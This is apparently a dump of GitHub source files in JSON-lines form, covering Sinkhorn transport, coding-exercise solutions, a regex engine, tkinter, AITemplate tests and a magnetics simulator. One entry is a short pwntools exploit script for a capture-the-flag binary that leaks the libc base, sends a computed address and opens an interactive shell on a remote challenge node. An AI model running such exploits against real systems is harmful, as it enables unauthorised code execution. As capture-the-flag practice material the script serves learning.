(±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n j = 0\n # if error goes up\n if err[-1] > err[-2]:\n if verbose:\n print(f'#iterations={i+1}, early stopping: error up, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n break\n else:\n if verbose:\n print(f'#iterations={i+1}, err={err[-1]:.5e}, {np.mean(t)*1000:3.3f} (±{np.std(t)*1000:1.1e}) ms per iteration')\n if plot and store_err:\n plt.figure(figsize=(10,4))\n plt.title(f'error rate, {np.mean(t)*1000:3.3f}ms per iteration')\n plt.semilogy(range(len(err)-1), err[1:])\n plt.savefig('error.png')\n plt.close()\n method='toeplitz'\n np.save(f'K_{method}.npy', K)\n np.save(f'a_{method}.npy', a)\n np.save(f'b_{method}.npy', b)\n if testtime:\n if return_err:\n return K, a, b, bins, p, q, testtime, err\n else:\n if return_err:\n return K, a, b, bins, p, q, err\n return K, a, b, bins, p, q\n","repo_name":"svdcvt/sinkhorn_ot","sub_path":"sinkhorn_utils.py","file_name":"sinkhorn_utils.py","file_ext":"py","file_size_in_byte":15336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"756529366","text":"#coding:utf-8\nimport sys\nimport base64\nfrom pwn import *\ncontext.log_level='debug'\ncontext.arch='i386'\nwhile True :\n\t#try :\n\t\tif len(sys.argv)==1 :\n\t\t\tio=process('./exploitable')\n\t\t\t#io=process(['./pwn'],env={'LD_PRELOAD':'./libc.so.6'})\n\t\t\telf=ELF('./exploitable')\n\t\t\tlibc=ELF('/lib/i386-linux-gnu/libc-2.23.so')\n\t\telse :\n\t\t\tio=remote('node3.buuoj.cn',26732)\n\t\t\telf=ELF('exploitable')\n\t\t\tlibc=ELF('../../i386libc/x86_libc.so.6')\n\t\t\n\t\t\n\t\tlibc_base=u32(io.recv(4))-libc.sym['_IO_2_1_stdout_']\n\t\tlibc.address=libc_base\n\t\t# gdb.attach(io)\n\t\t# pause()\n\t\tio.sendline(str(libc_base+0x3a80c-0x100000000))\n\n\n\t\tsuccess(hex(libc_base))\n\t\tio.interactive()\n\n\n\t#except Exception as e:\n\t\t#raise e\n\t#else:\n\t\t#pass","repo_name":"ilovekeer/Buuoj-Pwn","sub_path":"pwnable.kr/exploitable/exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"68"} +{"seq_id":"24340797576","text":"def find_array_quadruplet(arr, s):\r\n # corner case\r\n if len(arr) < 4:\r\n return []\r\n if len(arr) == 4:\r\n if sum(arr) == s:\r\n return sorted(arr)\r\n return []\r\n \r\n arr.sort()\r\n def two_sum(nums, start, end, target):\r\n res = set()\r\n while start < end:\r\n summation = nums[start] + nums[end]\r\n if summation == target:\r\n res.add((nums[start], nums[end]))\r\n start += 1\r\n end -= 1\r\n elif summation < target:\r\n start += 1\r\n else:\r\n end -= 1\r\n return res \r\n\r\n def three_sum(nums, target):\r\n res = set()\r\n for i in range(len(nums) - 2):\r\n doublets = two_sum(nums, i + 1, len(nums) - 1, target - nums[i])\r\n if doublets:\r\n for doublet in doublets:\r\n res.add((nums[i], doublet[0], doublet[1]))\r\n return res\r\n\r\n res = set()\r\n for i in range(len(arr) - 3):\r\n triplets = three_sum(arr[i + 1:], s - arr[i])\r\n if triplets:\r\n for triplet in triplets:\r\n res.add((arr[i], triplet[0], triplet[1], triplet[2]))\r\n if not res:\r\n return []\r\n res_sort = [sorted(i) for i in res]\r\n res_sort.sort()\r\n return res_sort[0]\r\n\r\ndef find_array_quadruplet_1(arr, s):\r\n if len(arr) < 4:\r\n return []\r\n\r\n def two_sum(nums, start, end, target):\r\n while start < end:\r\n summation = nums[start] + nums[end]\r\n if summation == target:\r\n return (start, end)\r\n elif summation < target:\r\n start +=1 \r\n else:\r\n end -= 1\r\n return (-1, -1)\r\n\r\n arr.sort()\r\n start = 0\r\n end = len(arr) - 1\r\n while start < end:\r\n summation = arr[start] + arr[end]\r\n if summation < s:\r\n middle_indexes = two_sum(arr, start + 1, end - 1, s - summation)\r\n if middle_indexes != (-1, -1):\r\n return [arr[start], arr[middle_indexes[0]], arr[middle_indexes[1]], arr[end]]\r\n\r\n if summation > s:\r\n end -= 1\r\n else:\r\n start += 1\r\n return []\r\n\r\ndef find_array_quadruplet_2(arr, s):\r\n if len(arr) < 4:\r\n return []\r\n\r\n arr.sort()\r\n for i in range(len(arr) - 3):\r\n for j in range(i + 1, len(arr) - 2):\r\n r = s - arr[i] - arr[j]\r\n l = j + 1\r\n h = len(arr) - 1\r\n while l < h:\r\n if arr[l] + arr[h] < r:\r\n l += 1\r\n elif arr[l] + arr[h] > r:\r\n h -=1\r\n else:\r\n return [arr[i], arr[j], arr[l], arr[h]]\r\n\r\n return []\r\n \r\n\r\nprint(find_array_quadruplet([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet([1,2,3,4,5,9,19,12,12,19], 40))\r\n\r\nprint(find_array_quadruplet_1([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet_1([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet_1([1,2,3,4,5,9,19,12,12,19], 40))\r\n\r\nprint(find_array_quadruplet_2([2, 7, 4, 0, 9, 5, 1, 3], 20))\r\nprint(find_array_quadruplet_2([4, 4, 4, 2], 16))\r\nprint (find_array_quadruplet_2([1,2,3,4,5,9,19,12,12,19], 40))\r\n","repo_name":"curieshicy/My_Utilities_Code","sub_path":"Useful_Code_Snippets/array_quadruplet.py","file_name":"array_quadruplet.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14844538124","text":"class Regex:\n\n def match(self, pattern, string):\n pattern_1 = pattern\n if '?' in pattern or '*' in pattern or '+' in pattern:\n if '\\\\' not in pattern:\n pattern = self.check_repeat(pattern, string)\n pattern = pattern.replace('\\\\', '')\n if '^' in pattern_1 and '^' not in pattern:\n pattern = '^' + pattern\n if '$' in pattern_1 and '$' not in pattern:\n pattern += '$'\n if pattern.startswith('^') and pattern.endswith('$'):\n return pattern[1:-1] == string\n elif pattern.startswith('^'):\n pattern, string = pattern[1:], string[:len(pattern) - 1]\n elif pattern.endswith('$'):\n pattern, string = pattern[:-1], string[-(len(pattern) - 1):]\n return self.iterate(pattern, string)\n\n def iterate(self, pattern, string):\n for i in range(len(string) - len(pattern) + 1):\n if self.compare(pattern, string[i:i + len(pattern)]):\n return True\n return False\n\n @staticmethod\n def compare(pattern, string):\n if '\\\\' in pattern:\n pattern = pattern.replace('\\\\', '')\n if pattern and string:\n for i, j in zip(pattern, string):\n if i == j or i == '.':\n continue\n else:\n return False\n return True\n elif not pattern and not string or string:\n return True\n return False\n\n def check_repeat(self, pattern, string):\n for i in '?*+':\n if i in pattern:\n index = pattern.index(i)\n zero = pattern[:index - 1] + pattern[index + 1:]\n once = pattern.replace(i, '')\n if i == '?':\n return zero if zero == string else once\n elif i == '*':\n return zero if zero == string else self.repeat(pattern, string)\n else:\n more = self.repeat(pattern, string)\n return more\n return pattern\n\n @staticmethod\n def repeat(pattern, string):\n for i, j in enumerate(pattern):\n if j == '.':\n pattern = pattern.replace(j, string[i - 1])\n elif j in '^$':\n pattern = pattern.replace(j, '')\n index = pattern.index('*') if '*' in pattern else pattern.index('+')\n head = pattern[:index]\n tail = pattern[index + 1:]\n while head + head[-1] in string:\n head += head[-1]\n else:\n return head + tail\n\n\nif __name__ == '__main__':\n re = Regex()\n target = input().split('|')\n result = re.match(*target)\n print(result)\n","repo_name":"icsolution/Regex_Engine","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"34347253257","text":"class Solution:\r\n # @param A : list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n\r\n if len(A) % 2 == 0:\r\n return 0\r\n\r\n else:\r\n xorVal = A[0]\r\n for i in range(2, len(A), 2):\r\n xorVal ^= A[i]\r\n\r\n return xorVal\r\n\r\nans = Solution()\r\nA = [1, 2, 3]\r\nprint(ans.solve(A))","repo_name":"PrinceSinghhub/InterviewBit-Bit-Manipulation","sub_path":"Interview Bit Bit Manipulation/XOR-ing the Subarrays!.py","file_name":"XOR-ing the Subarrays!.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"13430526182","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n\n path('', views.index, name='index'),\n\n path('projects', views.project, name='projects'),\n\n path('tag/', views.tag, name='single-tag'),\n\n path('project/', views.single_project, name='project'),\n\n path('contact', views.contact, name='contact'),\n\n]","repo_name":"rickmutua/rickmutua.github.io","sub_path":"rick/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9866717397","text":"import tkinter as tk\nfrom tkinter import ttk\nimport pyodbc\nfrom tkinter import messagebox, END\n# Utilize tkinter class to accomplish the following:\n#\n# Create a window with an appropriate title\nfrom tkinter.messagebox import showinfo\n\nwindow = tk.Tk()\nwindow.geometry(\"800x600\")\nwindow.title('Welcome to the Class tkinter assignment')\n#window_title = tk.Label(text = \"Welcome to the CYSE 1002-B 6184 Class March 23st tkinter assignment\",foreground=\"blue\",background=\"black\",width = 500,height=5)\n#window_title.pack()\n\n#Combo box\nlabel = ttk.Label(text=\"Please select a Semester:\")\nlabel.pack(fill=tk.X, padx=5, pady=5)\nlabel.place(x=400, y = 110)\n\n# create a combobox\nselected_sem = tk.StringVar()\nsem_cb = ttk.Combobox(textvariable=selected_sem)\n# place the widget\nsem_cb.pack(fill=tk.X, padx=5, pady=5)\nsem_cb.place(x=400, y = 130)\n\n\n\nsem_cb['values'] = [('Winter', 'First Semester selected!'),\n ('Spring', 'Second Semester selected!'),\n ('Fall', 'Third Semester selected!'),\n ('Internship', 'Co-op Semester selected!')]\n\n# prevent typing a value\nsem_cb['state'] = 'readonly'\n\n\n\n# bind the selected value changes\ndef sem_changed(event):\n ##\"\"\" Handle the Semester changed event \"\"\"\n showinfo(\n title='Result',\n message=f'You selected {selected_sem.get()}!'\n )\n\nsem_cb.bind('<>', sem_changed)\n\n\n\n#radio button selection\ndef show_selected_sem():\n showinfo(\n title='Result',\n message=selected_sem.get()\n )\nselected_sem = tk.StringVar()\nsizes = (('Winter', 'First Semester selected!'),\n ('Spring', 'Second Semester selected!'),\n ('Fall', 'Third Semester selected!'),\n ('Internship', 'Co-op Semester selected!'))\nlabel = tk.Label(text=\"Select Any Semester?\")\nlabel.pack(fill='x', padx=4, pady=4)\nlabel.place(x=200, y = 110)\n\n# radio buttons\ncount = 5\nfor size in sizes:\n r = tk.Radiobutton(\n text=size[0],\n value=size[1],\n variable=selected_sem\n )\n r.pack(padx=4, pady=4)\n r.place(x=200+count, y=140+count)\n\n\n# # button\n# button = tk.Button(\n# text=\"Get Selected Semester\",\n# command=show_selected_sem)\n#\n# button.pack(fill='x', padx=5, pady=5)\n# button.place(x=200,y=300)\n\n#combo box\n\nwindow.mainloop()\n","repo_name":"Prabhjeet93/tkInterProjectPython","sub_path":"tkinterProject2.py","file_name":"tkinterProject2.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72646831896","text":"import unittest\n\nfrom typing import List\n\nimport torch\n\nfrom aitemplate.compiler import compile_model, ops\nfrom aitemplate.compiler.ops.common.epilogue import FuncEnum\nfrom aitemplate.frontend import Tensor\nfrom aitemplate.testing import detect_target\nfrom aitemplate.utils import shape_utils\nfrom aitemplate.utils.graph_utils import get_sorted_ops\n\n\nclass GemmRrrSmallNkTestCase(unittest.TestCase):\n def _create_gemm_rrr_graph(self, M, K, N):\n X = Tensor(shape=[M, K], dtype=\"float16\", name=\"input_0\", is_input=True)\n W = Tensor(shape=[K, N], dtype=\"float16\", name=\"input_1\", is_input=True)\n OP = ops.gemm_rrr()\n Y = OP(X, W)\n Y._attrs[\"name\"] = \"gemm_rrr_tensor\"\n Y._attrs[\"is_output\"] = True\n\n return X, W, Y\n\n def _test_small_nk(self, Ms, N, K, testname=None):\n if testname is None:\n testname = \"gemm_rrr_small_nk_{}_{}_{}\".format(Ms, N, K)\n testname = testname.replace(\" \", \"\")\n testname = testname.replace(\"[\", \"\")\n testname = testname.replace(\"]\", \"\")\n\n X, W, gemm_tensor = self._create_gemm_rrr_graph(\n shape_utils.gen_int_var_min_max(Ms), K, N\n )\n\n output = ops.elementwise(FuncEnum.COS)(gemm_tensor)\n output._attrs[\"name\"] = \"output_0\"\n output._attrs[\"is_output\"] = True\n\n # Check value correctness\n target = detect_target()\n module = compile_model([output, gemm_tensor], target, \"./tmp\", testname)\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"gemm_rrr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(\n output_tensor, \"Cannot find output tensor from module's graph\"\n )\n self.assertEqual(\n len(output_tensor._attrs[\"src_ops\"]),\n 1,\n \"Incorrect counts of src_ops in output\",\n )\n\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n self.assertEqual(\n src_op._attrs[\"op\"], \"gemm_rrr_small_nk\", \"output op type incorrect\"\n )\n\n for m in Ms:\n X_pt = torch.randn(m, K).cuda().half()\n W_pt = torch.randn(K, N).cuda().half()\n mm_pt = torch.matmul(X_pt, W_pt)\n Y_pt = torch.cos(mm_pt)\n y = torch.empty([m, N]).cuda().half()\n gemm_tensor_pt = torch.empty([m, N]).cuda().half()\n module.run_with_tensors(\n {\"input_0\": X_pt, \"input_1\": W_pt},\n {\"output_0\": y, \"gemm_rrr_tensor\": gemm_tensor_pt},\n )\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n def test_small_nk(self):\n self._test_small_nk([10], 8, 4)\n self._test_small_nk([105], 8, 8)\n self._test_small_nk([1000], 6, 4)\n\n def test_small_nk_dynamic_shape(self):\n self._test_small_nk([10, 30], 6, 4, \"dynamic\")\n self._test_small_nk([10, 30, 50], 6, 4, \"dynamic1\")\n\n def test_small_nk_alignment(self):\n self._test_small_nk([1000], 6, 3)\n self._test_small_nk([10], 6, 3)\n self._test_small_nk([100, 200], 6, 3)\n self._test_small_nk([105], 7, 1)\n\n def test_small_nk_no_transform(self):\n M, K, N = 8, 8, 16\n _, _, output = self._create_gemm_rrr_graph(M, K, N)\n\n target = detect_target()\n module = compile_model(\n output, target, \"./tmp\", \"test_small_nk_fail_{}_{}_{}\".format(M, K, N)\n )\n\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"gemm_rrr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(\n output_tensor, \"Cannot find output tensor from module's graph\"\n )\n self.assertEqual(\n len(output_tensor._attrs[\"src_ops\"]),\n 1,\n \"Incorrect counts of src_ops in output\",\n )\n\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n self.assertEqual(src_op._attrs[\"op\"], \"gemm_rrr\", \"output op type incorrect\")\n\n X_pt = torch.randn(M, K).cuda().half()\n W_pt = torch.randn(K, N).cuda().half()\n Y_pt = torch.matmul(X_pt, W_pt)\n\n y = torch.empty([M, N]).cuda().half()\n module.run_with_tensors({\"input_0\": X_pt, \"input_1\": W_pt}, [y])\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n\nclass BmmRcrN1TestCase(unittest.TestCase):\n def _create_bmm_rcr_graph(self, B, M, N, K):\n X = Tensor(shape=[B, M, K], dtype=\"float16\", name=\"input_0\", is_input=True)\n W = Tensor(shape=[B, N, K], dtype=\"float16\", name=\"input_1\", is_input=True)\n OP = ops.bmm_rcr()\n Y = OP(X, W)\n Y._attrs[\"name\"] = \"bmm_rcr_tensor\"\n\n return X, W, Y\n\n def _test_n1_k8(self, B, M, N, K, testname=None):\n if testname is None:\n testname = \"bmm_rcr_n1_{}_{}_{}_{}\".format(B, M, N, K)\n testname = testname.replace(\" \", \"\")\n testname = testname.replace(\"[\", \"\")\n testname = testname.replace(\"]\", \"\")\n\n X, W, bmm_tensor = self._create_bmm_rcr_graph(\n B, shape_utils.gen_int_var_min_max(M), N, K\n )\n mul = ops.elementwise(FuncEnum.MUL)(bmm_tensor, Tensor(shape=[], value=1.0))\n output = ops.elementwise(FuncEnum.COS)(mul)\n output._attrs[\"name\"] = \"output_0\"\n output._attrs[\"is_output\"] = True\n\n # Check value correctness\n target = detect_target()\n module = compile_model(output, target, \"./tmp\", testname)\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"bmm_rcr_tensor\":\n output_tensor = tensor\n break\n\n assert output_tensor is not None\n assert len(output_tensor._attrs[\"src_ops\"]) == 1\n src_op = list(output_tensor._attrs[\"src_ops\"])[0]\n assert src_op._attrs[\"op\"] == \"bmm_rcr_n1\"\n\n for m in M:\n X_pt = torch.randn(B, m, K).cuda().half()\n W_pt = torch.randn(B, N, K).cuda().half()\n\n def pt_bmm(X_pt, W_pt):\n WT = torch.transpose(W_pt, 2, 1)\n Y_pt = torch.bmm(X_pt, WT)\n return Y_pt\n\n Y_pt = torch.cos(pt_bmm(X_pt, W_pt))\n\n y = torch.empty([B, m, N]).cuda().half()\n module.run_with_tensors({\"input_0\": X_pt, \"input_1\": W_pt}, [y])\n self.assertTrue(torch.allclose(Y_pt, y, atol=1e-1, rtol=1e-1))\n\n def test_n1_k8(self):\n self._test_n1_k8(1, [8], 1, 8)\n self._test_n1_k8(10, [8], 1, 8)\n\n def test_n1_k8_dynamic(self):\n self._test_n1_k8(10, [8, 16], 1, 8)\n\n def test_n_non1_fail(self):\n B, M, K, N = 8, 8, 8, 8\n _, _, output = self._create_bmm_rcr_graph(B, M, K, N)\n output._attrs[\"is_output\"] = True\n\n target = detect_target()\n module = compile_model(output, target, \"./tmp\", \"bmm_rcr_n_non1\")\n\n output_tensor = None\n for tensor in module.debug_sorted_graph:\n if tensor._attrs[\"name\"] == \"bmm_rcr_tensor\":\n output_tensor = tensor\n break\n\n self.assertIsNotNone(output_tensor, \"bmm_rcr tensor not found\")\n self.assertEqual(len(output_tensor._attrs[\"src_ops\"]), 1)\n src_op = next(iter(output_tensor._attrs[\"src_ops\"]))\n self.assertEqual(src_op._attrs[\"op\"], \"bmm_rcr\")\n\n\n@unittest.skip(\"enable it when ck fix\")\nclass OneByOneConvTestCase(unittest.TestCase):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self._counter = 0\n\n def _assert_no_convs(self, sorted_graph: List[Tensor]):\n for op in get_sorted_ops(sorted_graph):\n self.assertFalse(op._attrs[\"op\"].startswith(\"conv2d\"))\n\n def _assert_has_gemm(self, sorted_graph: List[Tensor]):\n for op in get_sorted_ops(sorted_graph):\n if op._attrs[\"op\"].startswith(\"gemm_rcr\"):\n return\n raise AssertionError(\"Did not find gemm_rcr in graph\")\n\n def _test_simple_1x1_conv(\n self, batch, CO, HH, WW, CI, activation=None, with_bias=False\n ):\n if isinstance(batch, int):\n batch = (batch,)\n batch_var = shape_utils.gen_int_var_min_max(batch, name=\"batch_size\")\n X = Tensor(\n shape=[batch_var, HH, WW, CI],\n name=\"input_0\",\n is_input=True,\n )\n W = Tensor(\n shape=[CO, 1, 1, CI],\n name=\"input_1\",\n is_input=True,\n )\n\n if with_bias:\n bias = Tensor(\n shape=[CO],\n name=\"bias\",\n is_input=True,\n )\n conv2d = ops.conv2d_bias(stride=1, pad=0)(X, W, bias)\n else:\n conv2d = ops.conv2d(stride=1, pad=0)(X, W)\n\n if activation == \"relu\":\n conv2d = ops.elementwise(FuncEnum.RELU)(conv2d)\n elif activation == \"sigmoid\":\n conv2d = ops.elementwise(FuncEnum.SIGMOID)(conv2d)\n\n elif activation == \"hardswish\":\n # We have no FuncEnum.HARDSWISH, must use fused version\n if with_bias:\n conv2d = ops.conv2d_bias_hardswish(stride=1, pad=0)(X, W, bias)\n else:\n raise NotImplementedError(\"Cannot use hardswish on conv2d without bias\")\n\n elif activation is not None:\n raise NotImplementedError(f\"Unsupported activation {activation}\")\n\n conv2d._attrs[\"name\"] = \"output\"\n conv2d._attrs[\"is_output\"] = True\n\n with compile_model(\n conv2d,\n detect_target(),\n \"./tmp\",\n f\"test_simple_one_by_one_conv_{self._counter}\",\n ) as module:\n self._counter += 1\n self._assert_no_convs(module.debug_sorted_graph)\n self._assert_has_gemm(module.debug_sorted_graph)\n\n for batch_pt in batch:\n X_pt = torch.randn(batch_pt, CI, HH, WW).half().cuda()\n W_pt = torch.randn(CO, CI, 1, 1).half().cuda()\n\n if with_bias:\n B_pt = torch.randn(CO).half().cuda()\n else:\n B_pt = None\n\n Y_pt = torch.nn.functional.conv2d(\n X_pt, W_pt, bias=B_pt, stride=1, padding=0\n )\n\n if activation == \"relu\":\n Y_pt = torch.relu(Y_pt)\n elif activation == \"sigmoid\":\n Y_pt = torch.sigmoid(Y_pt)\n elif activation == \"hardswish\":\n Y_pt = torch.nn.functional.hardswish(Y_pt)\n elif activation is not None:\n raise NotImplementedError(f\"Unsupported activation {activation}\")\n\n Y_ait = torch.empty(batch_pt, HH, WW, CO).half().cuda()\n inputs = {\n \"input_0\": X_pt.permute(0, 2, 3, 1).contiguous(),\n \"input_1\": W_pt.permute(0, 2, 3, 1).contiguous(),\n }\n if with_bias:\n inputs[\"bias\"] = B_pt\n\n module.run_with_tensors(inputs, {\"output\": Y_ait})\n\n torch.testing.assert_close(\n Y_pt, Y_ait.permute(0, 3, 1, 2), atol=1e-1, rtol=1e-1\n )\n\n def test_1x1_conv_no_bias(self):\n self._test_simple_1x1_conv(batch=1, CO=256, HH=3, WW=4, CI=2)\n self._test_simple_1x1_conv(\n batch=3, CO=100, HH=200, WW=4, CI=2, activation=\"relu\"\n )\n self._test_simple_1x1_conv(\n batch=2, CO=128, HH=10, WW=42, CI=3, activation=\"sigmoid\"\n )\n self._test_simple_1x1_conv(batch=5, CO=256, HH=15, WW=5, CI=13)\n self._test_simple_1x1_conv(batch=(1, 10), CO=128, HH=2, WW=2, CI=10)\n\n def test_1x1_conv_with_bias(self):\n self._test_simple_1x1_conv(batch=1, CO=256, HH=3, WW=4, CI=2, with_bias=True)\n self._test_simple_1x1_conv(\n batch=3,\n CO=100,\n HH=200,\n WW=4,\n CI=2,\n activation=\"relu\",\n with_bias=True,\n )\n self._test_simple_1x1_conv(\n batch=2, CO=128, HH=10, WW=42, CI=3, activation=\"sigmoid\", with_bias=True\n )\n self._test_simple_1x1_conv(\n batch=2, CO=64, HH=10, WW=42, CI=3, activation=\"hardswish\", with_bias=True\n )\n self._test_simple_1x1_conv(batch=5, CO=256, HH=15, WW=5, CI=13, with_bias=True)\n self._test_simple_1x1_conv(\n batch=(1, 10), CO=128, HH=2, WW=2, CI=10, with_bias=True\n )\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"qolaba/aitemplate-stable-diffusion","sub_path":"tests/unittest/compiler/test_transform_special_op.py","file_name":"test_transform_special_op.py","file_ext":"py","file_size_in_byte":12622,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"13176789298","text":"from scipy.constants import mu_0\nimport re\nimport numpy as np\nfrom SimPEG import Utils, PF\n\n\nclass problem(object):\n \"\"\"\n Earth's field:\n - Binc, Bdec : inclination and declination of Earth's mag field\n - Bigrf : amplitude of earth's field in units of nT\n\n Remnance:\n - Q : Koenigsberger ratio\n - Rinc, Rdec : inclination and declination of remnance in block\n\n \"\"\"\n #Bdec, Binc, Bigrf = 90., 0., 50000.\n Q, rinc, rdec = 0., 0., 0.\n uType, mType = 'tf', 'induced'\n susc = 1.\n prism = None\n survey = None\n\n @property\n def Mind(self):\n # Define magnetization direction as sum of induced and remanence\n mind = PF.Magnetics.dipazm_2_xyz([self.survey.srcField.param[1]], [self.survey.srcField.param[2]])\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n Mind = self.susc*self.Higrf*R.dot(mind.T)\n # Mind = self.susc*self.Higrf*PF.Magnetics.dipazm_2_xyz(self.Binc - self.prism.pinc,\n # self.Bdec - self.prism.pdec)\n return Mind\n\n @property\n def Mrem(self):\n\n mrem = PF.Magnetics.dipazm_2_xyz([self.rinc], [self.rdec])\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n Mrem = self.Q*self.susc*self.Higrf * R.dot(mrem.T)\n\n # Mrem = self.Q*self.susc*self.Higrf * \\\n # PF.Magnetics.dipazm_2_xyz(self.rinc - self.prism.pinc, self.rdec - self.prism.pdec)\n\n return Mrem\n\n @property\n def Higrf(self):\n Higrf = self.survey.srcField.param[0] * 1e-9 / mu_0\n\n return Higrf\n\n @property\n def G(self):\n\n if getattr(self, '_G', None) is None:\n #print \"Computing G\"\n\n # rot = Utils.mkvc(PF.Magnetics.dipazm_2_xyz(self.prism.pinc, self.prism.pdec))\n\n # rxLoc = Utils.rotatePointsFromNormals(self.survey.rxLoc, rot, np.r_[0., 1., 0.],\n # np.r_[0, 0, 0])\n\n rxLoc = self.survey.srcField.rxList[0].locs\n\n xLoc = rxLoc[:, 0] - self.prism.xc\n yLoc = rxLoc[:, 1] - self.prism.yc\n zLoc = rxLoc[:, 2] - self.prism.zc\n\n R = rotationMatrix(-self.prism.pinc, -self.prism.pdec, normal=False)\n\n rxLoc = R.dot(np.c_[xLoc, yLoc, zLoc].T).T\n\n rxLoc = np.c_[rxLoc[:, 0] + self.prism.xc, rxLoc[:, 1] + self.prism.yc, rxLoc[:, 2] + self.prism.zc]\n\n # Create the linear forward system\n self._G = Intrgl_Fwr_Op(self.prism.xn, self.prism.yn, self.prism.zn, rxLoc)\n\n return self._G\n\n def fields(self):\n\n if (self.mType == 'induced') or (self.mType == 'total'):\n\n b = self.G.dot(self.Mind)\n self.fieldi = self.extractFields(b)\n\n if (self.mType == 'remanent') or (self.mType == 'total'):\n\n b = self.G.dot(self.Mrem)\n\n self.fieldr = self.extractFields(b)\n\n if self.mType == 'induced':\n return [self.fieldi]\n elif self.mType == 'remanent':\n return [self.fieldr]\n elif self.mType == 'total':\n return [self.fieldi, self.fieldr]\n\n def extractFields(self, bvec):\n\n nD = int(bvec.shape[0]/3)\n bvec = np.reshape(bvec, (3, nD))\n\n # rot = Utils.mkvc(PF.Magnetics.dipazm_2_xyz(-self.prism.pinc, -self.prism.pdec))\n\n # bvec = Utils.rotatePointsFromNormals(bvec.T, rot, np.r_[0., 1., 0.],\n # np.r_[0, 0, 0]).T\n\n R = rotationMatrix(self.prism.pinc, self.prism.pdec)\n bvec = R.dot(bvec)\n\n if self.uType == 'bx':\n u = Utils.mkvc(bvec[0, :])\n\n if self.uType == 'by':\n u = Utils.mkvc(bvec[1, :])\n\n if self.uType == 'bz':\n u = Utils.mkvc(bvec[2, :])\n\n if self.uType == 'tf':\n # Projection matrix\n Ptmi = PF.Magnetics.dipazm_2_xyz([self.survey.srcField.param[1]],\n [self.survey.srcField.param[2]])\n\n u = Utils.mkvc(Ptmi.dot(bvec))\n\n return u\n\n\ndef Intrgl_Fwr_Op(xn, yn, zn, rxLoc):\n\n \"\"\"\n\n Magnetic forward operator in integral form\n\n flag = 'ind' | 'full'\n\n 1- ind : Magnetization fixed by user\n\n 3- full: Full tensor matrix stored with shape([3*ndata, 3*nc])\n\n Return\n _G = Linear forward modeling operation\n\n \"\"\"\n\n yn2, xn2, zn2 = np.meshgrid(yn[1:], xn[1:], zn[1:])\n yn1, xn1, zn1 = np.meshgrid(yn[0:-1], xn[0:-1], zn[0:-1])\n\n Yn = np.c_[Utils.mkvc(yn1), Utils.mkvc(yn2)]\n Xn = np.c_[Utils.mkvc(xn1), Utils.mkvc(xn2)]\n Zn = np.c_[Utils.mkvc(zn1), Utils.mkvc(zn2)]\n\n ndata = rxLoc.shape[0]\n\n # Pre-allocate forward matrix\n G = np.zeros((int(3*ndata), 3))\n\n for ii in range(ndata):\n\n tx, ty, tz = PF.Magnetics.get_T_mat(Xn, Yn, Zn, rxLoc[ii, :])\n\n G[ii, :] = tx / 1e-9 * mu_0\n G[ii+ndata, :] = ty / 1e-9 * mu_0\n G[ii+2*ndata, :] = tz / 1e-9 * mu_0\n\n return G\n\ndef rotationMatrix(inc, dec, normal=True):\n \"\"\"\n Take an inclination and declination angle and return a rotation matrix\n\n \"\"\"\n\n phi = -np.deg2rad(np.asarray(inc))\n theta = -np.deg2rad(np.asarray(dec))\n\n Rx = np.asarray([[1, 0, 0],\n [0, np.cos(phi), -np.sin(phi)],\n [0, np.sin(phi), np.cos(phi)]])\n\n Rz = np.asarray([[np.cos(theta), -np.sin(theta), 0],\n [np.sin(theta), np.cos(theta), 0],\n [0, 0, 1]])\n\n if normal:\n R = Rz.dot(Rx)\n else:\n R = Rx.dot(Rz)\n\n return R\n","repo_name":"domfournier/scripts","sub_path":"Simulation/PFSimulator/Mag.py","file_name":"Mag.py","file_ext":"py","file_size_in_byte":5620,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"33059308282","text":"import math\r\n\r\n# I have lower cased the input below, for my program to recognise all valid entires:\r\ncalculation = (input(\"\"\"Which calculations would you like to perfrom? \\n\\nInvestment - to calculate the amount of interest you'll earn on your investment \\nBond - to 